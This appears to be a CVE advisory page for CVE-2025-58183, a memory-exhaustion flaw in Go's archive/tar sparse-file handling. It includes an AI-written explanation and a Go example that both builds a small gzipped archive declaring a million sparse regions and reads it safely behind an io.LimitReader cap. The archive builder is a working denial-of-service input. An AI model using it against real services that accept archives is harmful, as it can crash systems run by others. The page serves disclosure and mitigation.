CVE-2025-58183
Description
tar.Reader does not set a maximum size on the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A maliciously-crafted archive containing a large number of sparse regions can cause a Reader to read an unbounded amount of data from the archive into memory. When reading from a compressed source, a small compressed input can result in large allocations.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Go tar.Reader does not limit sparse region blocks, allowing unbounded memory allocation from a small compressed archive.
Vulnerability
The tar.Reader in Go's archive/tar package does not enforce a maximum on the number of sparse region data blocks it will read for a GNU tar pax 1.0 sparse file. In this format the sparse map (a region count followed by one offset and one length per region) is stored at the start of the entry's data section, and the reader pulls it from the archive into memory before parsing it. A maliciously crafted archive can therefore declare an arbitrarily large number of sparse regions and make the reader consume memory proportional to that number, without bound.[1][3]
Exploitation
An attacker exploits this by supplying a specially crafted tar archive whose sparse entry declares a very large number of regions. When a Go application processes it with tar.Reader, the reader reads the whole sparse map from the archive into memory; because a map of repeated small offsets and lengths compresses extremely well, a small compressed input (such as a gzip stream) can expand into an unbounded amount of data read into memory.[2][4] No authentication or special network position is required beyond the ability to hand the archive to the application, for example as a file upload or a downloaded package.
Impact
The primary impact is a denial of service through memory exhaustion. An attacker can cause the application to allocate excessive memory, potentially leading to crashes or system instability. This does not result in code execution or data corruption.[1][3]
Mitigation
This vulnerability is fixed in Go 1.24.8 and 1.25.2. Users should update to these versions or later; because the Go standard library is compiled into each binary, affected applications must be rebuilt with a fixed toolchain rather than merely deployed on an updated host. There is no workaround in archive/tar itself beyond applying the patch.[2][4] As defense in depth, applications that read archives from untrusted sources should bound the number of decompressed bytes they hand to tar.Reader, for example by wrapping the decompressor in io.LimitReader, which contains this and similar decompression-amplification issues independently of the toolchain version.
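The following Go program is added here as a worked example; it is not code from the Go project or from the cited references. It shows both halves of the problem described in the Vulnerability and Exploitation sections and the mitigation caveat above: it constructs, in memory, a GNU pax 1.0 sparse entry whose sparse map is about 4 MB of repeated regions yet gzips to a few kilobytes, and it reads archives through an io.LimitReader so that tar.Reader can never consume more decompressed bytes than the caller allows. The function names (ustarBlock, paxRecord, BuildGzippedSparseArchive, ListEntries), the file name payload.bin, the region count and the 1 MiB cap are this example's own choices, and the archive is constructed test data.

```go
package main

import (
	"archive/tar"
	"bytes"
	"compress/gzip"
	"errors"
	"fmt"
	"io"
	"strconv"
	"strings"
)

// ustarBlock builds a 512-byte USTAR header with only the fields archive/tar
// needs to accept it; the checksum is computed with its own field as spaces.
func ustarBlock(name string, typeflag byte, size int64) []byte {
	blk := make([]byte, 512)
	copy(blk[0:100], name)
	copy(blk[124:136], fmt.Sprintf("%011o\x00", size)) // size of the data section
	copy(blk[148:156], "        ")                     // checksum placeholder
	blk[156] = typeflag
	copy(blk[257:265], "ustar\x0000") // magic + version
	sum := 0
	for _, b := range blk {
		sum += int(b)
	}
	copy(blk[148:156], fmt.Sprintf("%06o\x00 ", sum))
	return blk
}

// pad512 returns a copy of data NUL-padded to the next 512-byte boundary.
func pad512(data []byte) []byte {
	out := make([]byte, (len(data)+511)/512*512)
	copy(out, data)
	return out
}

// paxRecord encodes "<len> <key>=<value>\n"; <len> counts the whole record.
func paxRecord(key, value string) string {
	body := " " + key + "=" + value + "\n"
	n := len(body) + len(strconv.Itoa(len(body)))
	if len(strconv.Itoa(n)) > len(strconv.Itoa(len(body))) {
		n++
	}
	return strconv.Itoa(n) + body
}

// BuildGzippedSparseArchive returns a constructed, gzipped tar archive with one
// GNU pax 1.0 sparse entry declaring numRegions regions, and the raw size. The
// sparse map opens the entry's data (count, then offset and length per region,
// one per line, block-padded); "0\n0\n" regions gzip to almost nothing.
func BuildGzippedSparseArchive(numRegions int) (gz []byte, rawLen int) {
	pax := paxRecord("GNU.sparse.major", "1") + paxRecord("GNU.sparse.minor", "0") +
		paxRecord("GNU.sparse.name", "payload.bin") + paxRecord("GNU.sparse.realsize", "4096")
	sparseMap := pad512([]byte(strconv.Itoa(numRegions) + "\n" + strings.Repeat("0\n0\n", numRegions)))
	var raw bytes.Buffer
	raw.Write(ustarBlock("PaxHeaders.0/payload.bin", tar.TypeXHeader, int64(len(pax))))
	raw.Write(pad512([]byte(pax)))
	// The size field covers the padded map (plus data regions; there are none here).
	raw.Write(ustarBlock("GNUSparseFile.0/payload.bin", tar.TypeReg, int64(len(sparseMap))))
	raw.Write(sparseMap)
	raw.Write(make([]byte, 1024)) // end-of-archive marker
	var buf bytes.Buffer
	zw := gzip.NewWriter(&buf)
	zw.Write(raw.Bytes())
	zw.Close()
	return buf.Bytes(), raw.Len()
}

// ListEntries walks a gzipped tar archive and returns the entry names.
// maxDecompressed caps the decompressed bytes tar.Reader may consume in total:
// past the cap it sees EOF and fails the entry instead of buffering the map.
func ListEntries(gzipped []byte, maxDecompressed int64) ([]string, error) {
	zr, err := gzip.NewReader(bytes.NewReader(gzipped))
	if err != nil {
		return nil, err
	}
	tr := tar.NewReader(io.LimitReader(zr, maxDecompressed))
	var names []string
	for {
		hdr, err := tr.Next()
		if errors.Is(err, io.EOF) {
			return names, nil
		}
		if err != nil {
			return names, err
		}
		names = append(names, hdr.Name)
		if _, err := io.Copy(io.Discard, tr); err != nil { // drain under the same cap
			return names, err
		}
	}
}

func main() {
	gz, rawLen := BuildGzippedSparseArchive(1_000_000)
	_, err := ListEntries(gz, 1<<20)
	fmt.Printf("%d compressed bytes -> %d raw bytes; capped read: %v\n", len(gz), rawLen, err)
}
```

With the cap in place, ListEntries returns an error for the million-region archive as soon as 1 MiB of decompressed data has been consumed, while a three-region archive of exactly the same layout is read normally and reported as payload.bin. Size the cap to the largest archive the application legitimately expects; the guard is defense in depth around the decompressor, not a substitute for rebuilding with a fixed Go release.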
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Patches (0)
No patches discovered yet.
References (5)
News mentions (0)
No linked articles in our index yet.